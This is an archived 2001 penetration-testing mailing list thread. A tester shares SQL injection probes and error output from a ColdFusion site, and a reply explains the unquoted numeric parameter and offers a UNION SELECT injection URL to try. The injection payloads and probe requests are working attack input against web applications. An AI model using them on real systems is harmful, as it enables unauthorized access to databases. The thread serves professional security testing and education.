Penetration Testing mailing list archives
Re: CFM SQL injection
From: "Kevin Spett" <kspett () spidynamics com>
Date: Mon, 17 Dec 2001 15:39:29 -0800
It looks like the query that you're attacking isn't prepending and appending quotes to your input. The string build probably looks a lil' sumthin' like this: Query = "SELECT FieldOne, FieldTwo, FieldThree FROM TableName WHERE PageID = " & strPageID This means that there is no need to use quotes in order to perform a successful injection. So, try something like this: http://www.server.com/page.cfm?page_id=9999 UNION SELECT OtherField FROM OtherTable WHERE 1=1 Hopefully this will return an error complaining about an invalid table name, or at least another error that may give you a better idea of what the web application is doing with your argument. Kevin Spett Archbishop of SQL Injection SPI Dynamics, Inc. ----- Original Message ----- From: "Charlie Liserne" <Chili () SexMagnet com> To: <pen-test () securityfocus com> Sent: Saturday, December 15, 2001 2:22 PM Subject: CFM SQL injection
Hello guys, I'm performing a pen-test against a web with Coldfusion installed. I
obtain
some error information, but I'm not able to do nothing because the server never understand the parameters I send. The correct page is as follows: http://www.server.com/page.cfm?page_id=8 My probes are following: ------------------- Request: http://www.server.com/page.cfm?page_id=8' Result: Invalid parameter type Cannot convert 19' to number. Please, check the ColdFusion manual for the allowed conversions between data types The error occurred while processing an element with a general identifier
of
(CFPARAM), occupying document position (5:1) to (5:61). Template: c:\blabla\page.cfm Query String: page_id=19' ------------------------ So it isn't interpreting the ' and I don't know how to execute commands.
It
seems that it is not an SQL issue, instead it looks a coldfusion error. Another probe follows: -------------------- Request: http://www.server.com/page.cfm?page_id=0 Result: ODBC Error Code = 37000 (Syntax error or access violation) [Microsoft][ODBC SQL Server Driver][SQL Server]Line 3: Incorrect syntax near '='. The error occurred while processing an element with a general identifier
of
(CFQUERY), occupying document position (15:1) to (16:65). ------------------ Okay, i get an error from the SQL database. But still don't know how to take advantage of it. I don't know the database name and I have very
little
info about it. Also, there are two more interesting probes: --------------------------- Request:http://www.server.com/page.cfm?page_id=3, Result: Invalid parameter type Cannot convert 3, to number. Please, check the ColdFusion manual for the allowed conversions between data types The error occurred while processing an element with a general identifier
of
(CFPARAM), occupying document position (5:1) to (5:61). ---------------------------- Request: http://www.server.com/page.cfm?page_id=3,4 Result: ODBC Error Code = 37000 (Syntax error or access violation) [Microsoft][ODBC SQL Server Driver][SQL Server]Line 3: Incorrect syntax near ','. The error occurred while processing an element with a general identifier
of
(CFQUERY), occupying document position (6:1) to (6:72). ------------------------------- Do you know how to exploit this (if it's possible)? Regards, Charlie. --------------------------------------------------------------------------
--
This list is provided by the SecurityFocus Security Intelligence Alert
(SIA)
Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please
see:
https://alerts.securityfocus.com/
---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- SQL INJECTION - ORACLE foo bar (Dec 10)
- Re: SQL INJECTION - ORACLE Michael Haunzwickl (Dec 10)
- CFM SQL injection Charlie Liserne (Dec 17)
- Re: CFM SQL injection Kevin Spett (Dec 19)
- Re: CFM SQL injection Charlie Liserne (Dec 24)
- CFM SQL injection Charlie Liserne (Dec 17)
- Re: SQL INJECTION - ORACLE Michael Haunzwickl (Dec 10)
- Re: SQL INJECTION - ORACLE Kevin Spett (Dec 10)